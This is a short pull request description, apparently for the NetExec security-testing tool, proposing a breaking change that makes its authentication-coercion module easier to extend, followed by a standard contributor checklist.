### PR DESCRIPTION
## Description

Make coerce plus module more flexible, users can add coerce auth easier than before

## Type of change
- [ ] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [√] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)

## Screenshots (if appropriate):
![image](https://github.com/user-attachments/assets/7f881875-a483-4bf1-9609-0a7564d8a60d)

## Checklist:

- [ ] I have ran Ruff against my changes (via poetry: `poetry run python -m ruff check . --preview`, use `--fix` to automatically fix what it can)
- [ ] I have added or updated the tests/e2e_commands.txt file if necessary
- [ ] New and existing e2e tests pass locally with my changes
- [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [ ] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)
